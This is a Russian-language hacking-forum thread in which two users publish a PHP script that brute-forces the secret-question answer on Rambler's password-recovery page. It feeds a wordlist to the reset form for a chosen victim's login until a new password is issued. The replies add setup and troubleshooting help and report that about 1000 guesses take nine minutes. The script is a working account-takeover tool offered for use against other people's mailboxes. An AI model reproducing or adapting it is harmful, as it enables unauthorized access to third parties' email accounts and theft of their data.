брутим....ответ на контрольный вопрос

Дело было вечером, делать было нефига как общаться по аське, в этот раз фигней страдали с zifanchuck'ом профиль моего большого ачатовского друга вот http://forum.antichat.ru/member.php?userid=66836 Ну что- дискутировали по поводу- а можно ли подобрать брутом ответ на контрольный вопрос? Обьектом нашего изучения стал рамблер, и вот как мы непытались вручную (путем многократных запросов) уйти в бан- так нифига и неудавалось.... (каптчу просили ввести только один, самый первый раз ), вот на этой волне и родился данный скрипт который мы предоставляем Вашему вниманию. А еще у нас с ним пари- как быстро админы рамблера прикроют откровенный баг))) (на много слов не тестили но после 200-300 неправильных находит правильный ответ), ответы нужно складывать в файл my.txt (в столбик- разумееться )
А да и чтоб было все по честному в скрипте проостенькая защита от школьников, так что неспрашивайте почему выдает ошибку при подключении))) Ну а сам скрипт собственно говоря вот))
P.S. И прошу не пинать так как данный скрипт писался для того чтоб удовлетворить наше любопытство и цель создания орудия для вскрытия ящиков перед нами не стояла))

PHP:

<?php
// (c)Kusto & zifanchuck
//for forum.antichat.ru
set_time_limit(0);
function curl($url,$post)
{
$cfile = 'cookies.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}


    function read($path)
{
   $file=fopen($path,"r");
   $bufer = fread($file,filesize($path));
   fclose($file);
   return($bufer);
}

$file = 'my.txt';
$domain = $_POST['domain'];
$login = $_POST['login'];

$result = curl('http://id.rambler.ru/script/reminder.cgi','');
$result = iconv("utf-8", "windows-1251", $result);


//получаем адрес каптчи
preg_match("#img id=\"secimage\" src=\"(http://id\.captcha\.rambler\.ru/(.*)\.jpg)#iU",$result, $cap);
$c=$cap[1];
$id=$cap[2];


if($login)
{
$res = iconv("utf-8", "windows-1251", curl("http://id.rambler.ru/script/reminder.cgi","action=question&skin=id&back=&back_immediate=&uniq_id=".$_POST['id']."&user.password=&user.login=".$login."&user.domain=".$domain."&user.captcha=".$_POST['captcha']."&done=%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%BB%D0%B6%D0  %B8%D1%82%D1%8C"));
preg_match("#indicator\"\>\<strong>(.*)\<\/strong#iU",$res, $qves)
}

if ($qves[1])
{
echo "<B><U><FONT SIZE=5 COLOR=GREEN>$qves[1]</FONT></U></B></br>";
$a = explode("\r\n",read($file));

for($i=0;$i<count($a);$i++)
{
$fam = $a[$i];
$bien = iconv("utf-8", "windows-1251",curl('http://id.rambler.ru/script/reminder.cgi','action=password&skin=id&uniq_id='.$_POST['id'].'&back=&user.password=&user.answer='.urlencode(iconv("windows-1251", "utf-8",$fam))));
if (strstr($bien, "новый пароль")) { echo " поздравляю ответ подобран $fam";exit;}
else {echo "ответ $fam не подошел <br>";}
flush();
}

}
else { echo "<B><U><FONT SIZE=5 COLOR=RED>Внимательно заполняем каптчу</FONT></U></B></br>";



     echo  '    <label for="captcha">Введите показанные на&nbsp;картинке символы:</label><br><br><br>
        <span id="captcha-wrapper" title="Введите показанные на картинке символы">
            <span class="secimage-wrapper">
                <img id="secimage" src="'.$c.'" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы">
                <span class="dummy"></span>
            </span><br><br>
            <form name="captcha_form" method="POST">
          <input type="text" name="captcha" value="" /><br>
          <input type="hidden" name="id" value="'.$id.'" />
            ';
  $err = '
  <html>
<head>

<body bgcolor=#c0c0c0>
 <form method="POST">

<p align=center>

                <label for="id-login">кого брутим?</label>
                <span class="indicator">
                    <input type="text" class="text" name="login" />

                    <select id="id-domain" class="text" name="domain" tabindex="1">
                        <option value="rambler.ru"  >@rambler.ru</option>
                        <option value="lenta.ru"  >@lenta.ru</option>

                        <option value="myrambler.ru"  >@myrambler.ru</option>
                        <option value="autorambler.ru"  >@autorambler.ru</option>
                        <option value="ro.ru"  >@ro.ru</option>
                        <option value="r0.ru"  >@r0.ru</option>
                    </select>

                </span><br><br><br><br><br><br>


<input type=submit value="ПОЕХАЛИ!!!">


           </form>
         </center>
</body>
<head>
</html>';
echo $err;
}
?>


апдейт скрипта находиться здесьhttps://forum.antichat.ru/showpost.php?p=2162759&postcount=34

 

случаем не защита от школьников ? )

 

нет-чуть ниже)))
P.S. ошибкуж выдает где косяк- кто хоть чуть чуть знает основы пыха- зделать рабочим скрипт дело одной секунды

 

мб пригодится. за старания +

 

В каком виде должны быть кукисы которые в cookies.txt ?

 

Скрипт сам туда запишет че надо=)

 

zifanchuck - большое спасибо, Kusto тебе тоже, понаставил бы вам плюсов да больше одного не могу((( также я не грин так что они ничего не стоят(

 

смотри личку

 

блин, с мозже поднимали эту тему дня 4 назад =\
спасибо за реализацию

 

типо надо safe_mode on ? А этот хостинг неподходит ?

 

на денвер ставь- и вообще хостинги нелюбят брут...

 

всё заработало, теперь ввел мыло которое собрался брутить, вылетел секр. вопрос но не вижу где статус прогреса брута, так и должно быть ? (Cори за тупые вопросы)

 

Пофиксенно (исправленн скрипт в 1 посте)

 

ok, спс, а с одного IP можно только один брутить ?

 

можно несколько

 

Прошу прошение за небольшой косяк))))- скрипт был написанн на коленке и сообщает только о найденом пассе- счас добавим чтоб сообщал если все ответы неверны (еще раз прошу прощение)))
ИСПРАВЛЕННО в первом посте (защиту от школьников сохранил в том-же месте)

 

x3 наверно этот не для моего ума(((
на деневере пишет : Fatal error: Call to undefined function curl_init() in Y:\home\localhost\www\bals.php on line 8
На шелле всё норм, только 123 уже х3 сколько подбирает)))
http://efedor.ru/img/menu/bals.php вот готовый брут, который у меня к сожалению не работает(

 

у тебя на денвере CURL неустановлен

 

Во всём разобрался, на сегодняшний день скрипт работает, большое спасибо
Пашет с хоста

 

только что провел тест- поставил правильный ответ на 999 позицию (т е запросов к серверу было порядка 1000) за 9 минут скрипт подобрал правильный ответ на вопрос
P.S. Это тем кто стучиться мне в личку с проьбами снять пресловутую "защиту" либо узнать скорость перебора)))